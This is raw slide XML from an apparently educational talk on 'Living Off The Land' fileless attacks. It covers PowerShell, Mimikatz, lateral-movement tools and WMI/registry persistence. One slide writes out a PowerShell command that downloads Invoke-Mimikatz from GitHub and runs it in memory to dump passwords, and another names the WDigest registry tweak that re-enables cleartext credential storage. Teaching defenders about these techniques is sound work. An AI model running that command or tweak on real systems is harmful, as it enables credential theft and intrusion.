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0"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId6"/>
    <p:sldId id="259" r:id="rId7"/>
    <p:sldId id="258" r:id="rId8"/>
    <p:sldId id="260" r:id="rId9"/>
    <p:sldId id="263" r:id="rId10"/>
    <p:sldId id="264" r:id="rId11"/>
    <p:sldId id="271" r:id="rId12"/>
    <p:sldId id="269" r:id="rId13"/>
    <p:sldId id="270" r:id="rId14"/>
    <p:sldId id="268" r:id="rId15"/>
    <p:sldId id="273" r:id="rId16"/>
    <p:sldId id="272" r:id="rId17"/>
    <p:sldId id="261" r:id="rId18"/>
    <p:sldId id="266" r:id="rId19"/>
    <p:sldId id="267" r:id="rId20"/>
    <p:sldId id="276" r:id="rId21"/>
    <p:sldId id="278" r:id="rId22"/>
    <p:sldId id="274" r:id="rId23"/>
    <p:sldId id="279" r:id="rId24"/>
    <p:sldId id="280" r:id="rId25"/>
    <p:sldId id="262" r:id="rId26"/>
    <p:sldId id="265" r:id="rId27"/>
    <p:sldId id="281" r:id="rId28"/>
    <p:sldId id="282" r:id="rId29"/>
  </p:sldIdLst>
  <p:sldSz cx="14630400" cy="82296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2D"/>
    <a:srgbClr val="06476F"/>
    <a:srgbClr val="3566A0"/>
    <a:srgbClr val="D55231"/>
    <a:srgbClr val="CF452B"/>
    <a:srgbClr val="C22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825" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="89" d="100"/>
          <a:sy n="89" d="100"/>
        </p:scale>
        <p:origin x="744" y="184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E7732-0252-4515-805C-C9D47A5D84DD}" type="datetimeFigureOut">
              <a:rPr lang="en-CA" smtClean="0"/>
              <a:t>2018-05-13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7241E-1623-4079-B22F-39157E937D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25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7241E-1623-4079-B22F-39157E937D5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56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3029714" y="6973114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29714" y="7473179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352800" y="1524000"/>
            <a:ext cx="10634690" cy="13716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44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52800" y="2971800"/>
            <a:ext cx="1063469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factu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3029714" y="6973114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29714" y="7473179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352800" y="1524000"/>
            <a:ext cx="10634690" cy="13716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44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52800" y="2971800"/>
            <a:ext cx="1063469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3029714" y="6973114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29714" y="7473179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352800" y="1524000"/>
            <a:ext cx="10634690" cy="13716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44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52800" y="2971800"/>
            <a:ext cx="1063469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it Un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3029714" y="6973114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29714" y="7473179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352800" y="1524000"/>
            <a:ext cx="10634690" cy="13716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44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52800" y="2971800"/>
            <a:ext cx="1063469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es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3029714" y="6973114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29714" y="7473179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352800" y="1524000"/>
            <a:ext cx="10634690" cy="13716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44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52800" y="2971800"/>
            <a:ext cx="1063469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3029714" y="6973114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29714" y="7473179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352800" y="1524000"/>
            <a:ext cx="10634690" cy="13716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44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52800" y="2971800"/>
            <a:ext cx="1063469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11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555875"/>
            <a:ext cx="10485438" cy="1765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999" y="4664075"/>
            <a:ext cx="9388475" cy="21018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895600" y="1758140"/>
            <a:ext cx="11125200" cy="4643470"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ECE7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6548057" y="-1608565"/>
            <a:ext cx="857256" cy="8162170"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2F1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1570" y="2133600"/>
            <a:ext cx="7391400" cy="6858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570" y="3048001"/>
            <a:ext cx="10210801" cy="609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5287963"/>
            <a:ext cx="10544175" cy="1635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3487738"/>
            <a:ext cx="10544175" cy="1800225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6958" y="1920875"/>
            <a:ext cx="10897642" cy="5430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6958" y="1920875"/>
            <a:ext cx="4192042" cy="5430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1920875"/>
            <a:ext cx="6507163" cy="5430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3029714" y="6973114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29714" y="7473179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352800" y="1524000"/>
            <a:ext cx="10634690" cy="13716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44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52800" y="2971800"/>
            <a:ext cx="1063469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6958" y="1841500"/>
            <a:ext cx="4420642" cy="768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6958" y="2609850"/>
            <a:ext cx="4420642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0000" y="1841500"/>
            <a:ext cx="4267200" cy="768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20000" y="2609850"/>
            <a:ext cx="4267200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8" y="7627938"/>
            <a:ext cx="3413125" cy="438150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{248221F3-5085-4B2F-88E1-1902236C0C32}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>5/13/18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99038" y="7627938"/>
            <a:ext cx="4632325" cy="438150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85438" y="7627938"/>
            <a:ext cx="3413125" cy="438150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E08688E6-6573-4B36-9F6F-DE6501AC72B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025" y="5761038"/>
            <a:ext cx="8778875" cy="679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025" y="735013"/>
            <a:ext cx="8778875" cy="493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025" y="6440488"/>
            <a:ext cx="8778875" cy="9667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8" y="7627938"/>
            <a:ext cx="3413125" cy="438150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{248221F3-5085-4B2F-88E1-1902236C0C32}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>5/13/18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9038" y="7627938"/>
            <a:ext cx="4632325" cy="438150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85438" y="7627938"/>
            <a:ext cx="3413125" cy="438150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E08688E6-6573-4B36-9F6F-DE6501AC72B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e &amp; Chee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3029714" y="6973114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29714" y="7473179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352800" y="1524000"/>
            <a:ext cx="10634690" cy="13716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44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52800" y="2971800"/>
            <a:ext cx="1063469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3029714" y="6973114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29714" y="7473179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352800" y="1524000"/>
            <a:ext cx="10634690" cy="13716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44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52800" y="2971800"/>
            <a:ext cx="1063469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3029714" y="6973114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29714" y="7473179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352800" y="1524000"/>
            <a:ext cx="10634690" cy="13716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44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52800" y="2971800"/>
            <a:ext cx="1063469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ergy &amp; Util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3029714" y="6973114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29714" y="7473179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352800" y="1524000"/>
            <a:ext cx="10634690" cy="13716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44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52800" y="2971800"/>
            <a:ext cx="1063469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l &amp; G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3029714" y="6973114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29714" y="7473179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352800" y="1524000"/>
            <a:ext cx="10634690" cy="13716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44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52800" y="2971800"/>
            <a:ext cx="1063469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rig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3029714" y="6973114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29714" y="7473179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352800" y="1524000"/>
            <a:ext cx="10634690" cy="13716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44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52800" y="2971800"/>
            <a:ext cx="1063469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3029714" y="6973114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29714" y="7473179"/>
            <a:ext cx="10991086" cy="428627"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:buNone/>
              <a:defRPr sz="24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352800" y="1524000"/>
            <a:ext cx="10634690" cy="13716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44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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="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52800" y="2971800"/>
            <a:ext cx="1063469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517A5D-560B-43D2-9E6E-CBEF0824F6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9" r="15659"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7010401" y="0"/>
            <a:ext cx="7619999" cy="8229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A1C3D5E-E015-40EB-9CE1-F871E6A15497}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="261943"/>
            <a:ext cx="14634000" cy="76200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C2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E997B-9457-4917-B1B9-3C6C5016D7AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="14634000" cy="288000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2F1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2F1E0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B869B-B853-4CB7-B1F7-79F1419A52B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="7513521"/>
            <a:ext cx="9684000" cy="152400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C2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2F1E0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9BA28E-F94E-4F87-B531-BDFBE06CA5D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="7616615"/>
            <a:ext cx="14634000" cy="612000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2F1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2F1E0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 descr="MNP ca.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D46001A-9D82-4C01-B58A-FF50D4BC822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13239686" y="7844914"/>
            <a:ext cx="708784" cy="153362"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="Picture 21" descr="ACT Line White.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9A7105C-DA99-48DF-874C-852996AB089E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604045" y="7855076"/>
            <a:ext cx="3688995" cy="1405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F5DA1B-C269-4116-8959-903B55CE41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3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="11918396" y="0"/>
            <a:ext cx="2166719" cy="1292803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E44BEEC4-A7DE-449A-8F66-C1859CDEA7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8401" y="432379"/>
            <a:ext cx="1526711" cy="49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46F3AC-95AB-41F0-8CDD-C6C7BA6CDECF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5679635" cy="1210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4" r:id="rId3"/>
    <p:sldLayoutId id="2147483673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BD652A9-DD76-4D6E-8ED2-AE62E91654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7" r="48245"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="225224"/>
            <a:ext cx="2249160" cy="7628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6958" y="1107709"/>
            <a:ext cx="884024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6958" y="2590800"/>
            <a:ext cx="10851605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61943"/>
            <a:ext cx="14634000" cy="76200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C2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4634000" cy="288000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2F1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2F1E0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7513521"/>
            <a:ext cx="9684000" cy="152400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C2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2F1E0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7616615"/>
            <a:ext cx="14634000" cy="612000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2F1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2F1E0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MNP c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13239686" y="7844914"/>
            <a:ext cx="708784" cy="153362"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11" descr="ACT Line White.pn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604045" y="7855076"/>
            <a:ext cx="3688995" cy="140532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3057496" y="7162800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900" dirty="0"/>
              <a:t>Page </a:t>
            </a:r>
            <a:fld id="{3AF6D275-A9DA-42A3-84CF-34071A21EB12}" type="slidenum">
              <a:rPr lang="en-CA" sz="900" smtClean="0"/>
              <a:pPr algn="r"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-CA" sz="90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3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="11918396" y="0"/>
            <a:ext cx="2166719" cy="1292803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8401" y="432379"/>
            <a:ext cx="1526711" cy="49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3" r:id="rId3"/>
    <p:sldLayoutId id="2147483664" r:id="rId4"/>
    <p:sldLayoutId id="2147483671" r:id="rId5"/>
    <p:sldLayoutId id="2147483665" r:id="rId6"/>
    <p:sldLayoutId id="2147483667" r:id="rId7"/>
    <p:sldLayoutId id="2147483669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0647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43714" y="5624514"/>
            <a:ext cx="10991086" cy="428627"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" b="1" dirty="0"/>
              <a:t>Sunny Jamwal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9C2355FC-320F-4A2B-973F-DF76BEC575B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="743714" y="5195887"/>
            <a:ext cx="10991086" cy="4286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Presented by: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D1C6F-9527-44A0-869D-13BE5D27982A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="746931" y="6327901"/>
            <a:ext cx="8378783" cy="992918"/>
            <a:chOff x="646510" y="6172200"/>
            <a:chExt cx="10991086" cy="13024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A0A42FC-A6AA-42B7-A1ED-A0B4135C6FFB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="766235" y="6172200"/>
              <a:ext cx="3181390" cy="756451"/>
              <a:chOff x="766235" y="6172200"/>
              <a:chExt cx="3181390" cy="75645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107C868-7E91-4A86-BDB6-01ECDC77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2825" y="6173852"/>
                <a:ext cx="754800" cy="754799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481638A-8122-42AF-AA87-BBBD95F58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5097" y="6172200"/>
                <a:ext cx="754800" cy="75479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1DA7190-3A50-431D-B2C1-CA7957441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3961" y="6172200"/>
                <a:ext cx="754800" cy="75479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EA83D24-05D4-4E7D-9814-C7CC300E3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235" y="6172200"/>
                <a:ext cx="754800" cy="754799"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="Text Placeholder 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CD95E10-0390-401E-A804-024C45A7EB52}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="646510" y="7046059"/>
              <a:ext cx="10991086" cy="428627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marL="489833" indent="-489833" algn="l" defTabSz="130622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61304" indent="-408194" algn="l" defTabSz="130622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CA" b="1" dirty="0"/>
                <a:t>MNP Technology Solutions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BD615AC-1369-458A-83C1-1A821D17245B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="743714" y="3684896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b="1" baseline="30000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="06476F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Living Off The Land</a:t>
            </a:r>
          </a:p>
          <a:p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BB68D2-5E56-48C6-AD87-988553ECF150}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7543800" y="1956555"/>
            <a:ext cx="2366201" cy="2366201"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill dpi="0" rotWithShape="1">
            <a:blip r:embed="rId6" cstate="print">
              <a:alphaModFix amt="8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9D03-244D-B94C-BFC1-33CE1D92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Use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3DEBE1-2EC0-5744-90A6-FD7AAA2B15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8831937"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3046413" y="2209800"/>
          <a:ext cx="10898188" cy="38100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449094">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1166941292"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="5449094">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="652302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Purpose</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="0048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System Tools</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="0048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43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Initial Foothold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VBScript, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
                        <a:t>CScript</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0"/>
                        <a:t>, PowerShell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1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Credential Stealing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Mimikatz</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0"/>
                        <a:t>, Windows Credential Editor (WCE)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0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Lateral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PsExec</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0"/>
                        <a:t>, RDP, PowerShell Remoting, Windows Management Instrumentation (WMI)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0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Persistence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WMI, Group Policy Object, Scheduled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30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9D03-244D-B94C-BFC1-33CE1D92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Use Tools :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A7CE90-07A6-5744-B1AA-104DC1591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DEMO!!!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="261552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7149-2F1C-7940-ABEA-0F55A5A9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433" y="914400"/>
            <a:ext cx="8840242" cy="1371600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In Memory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31EA-EAAA-8044-8728-1E77656F60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Code Red 2001and SQL Slammer 2003</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Less file drops make detection harder.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>System binaries are not scanned by traditional security measures.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Execution happens in memory making forensic analysis more difficult.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Introducing PowerShell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1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7149-2F1C-7940-ABEA-0F55A5A9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433" y="914400"/>
            <a:ext cx="8840242" cy="1371600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In Memory Attacks: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31EA-EAAA-8044-8728-1E77656F60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PowerShell is a Framework based on .NET, provide command line Shell.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Formally released on April 25, 2006</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PowerShell v2.0 was shipped with Windows 7 and Windows 2008 R2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Microsoft made PowerShell open source on August 2016.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross Platform support for MacOS, CentOS and Ubuntu</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="194769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FB11-781A-FF46-8689-A3E09841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Attacks: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E7BA-4B0A-754A-AD9F-13459E8DD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6958" y="2209799"/>
            <a:ext cx="10897642" cy="5141913"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No extensive logging enabled for workstation. Moreover PowerShell logging is not enabled by default.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PowerShell can download and execute payload directly in Memory.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Invoke-Expression aka IEX</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>More on this in the DEMO</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PowerShell is system administration tool hence malware can easily blend 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8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09BA-124E-304B-B9C1-02DD8F56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Attacks: PowerShell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8D581-0DFD-014C-AF77-5DBBED8C3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6958" y="2285999"/>
            <a:ext cx="10897642" cy="5065713"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In-memory execution of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> PowerShell Script to extract passwords from memory.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***Microsoft has fixed the clear storage of keys in memory however tweaking this key would change that behavior***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sz="1400" dirty="0"/>
              <a:t>HKEY_LOCAL_MACHINE\SYSTEM\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" err="1"/>
              <a:t>CurrentControlSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>\Control\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" err="1"/>
              <a:t>SecurityProviders</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" err="1"/>
              <a:t>WDigest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t> “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" err="1"/>
              <a:t>UseLogonCredential</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>”(DWORD)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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09BA-124E-304B-B9C1-02DD8F56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Attacks: PowerShell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8D581-0DFD-014C-AF77-5DBBED8C3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6958" y="2285999"/>
            <a:ext cx="10897642" cy="5065713"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>﻿</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>C:\Windows\system32&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>powershell.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> -command "Invoke-Expression -Command (New-Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>System.Net.WebClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>DownloadString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>('https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>raw.githubusercontent.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>/Burnd9671/Invoke-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>/master/Invoke-Mimikatz.ps1');Invoke-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> ”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lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Invoke-Expression</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="1" dirty="0"/>
              <a:t>Invoke-Expression</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t> cmdlet evaluates or runs a specified string as a command </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(New-Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>System.Net.WebClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>DownloadString</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Downloads the requested resource as a String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Storage and Execution Happens in Memory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7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09BA-124E-304B-B9C1-02DD8F56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Attacks: PowerShell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8D581-0DFD-014C-AF77-5DBBED8C3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6958" y="2285999"/>
            <a:ext cx="10897642" cy="5065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46112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4B72-8F36-6545-99C8-64EC4B56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Fileless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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A2D3-4E72-E643-9303-D69930D7C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6958" y="2133599"/>
            <a:ext cx="10897642" cy="5218113"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use of system components to maintain foothold after initial compromise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Two methods recently becoming more commonly abused by attackers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows Registry</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>WMI</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="403000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4B72-8F36-6545-99C8-64EC4B56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Fileless</a:t>
            </a:r>
            <a:r>
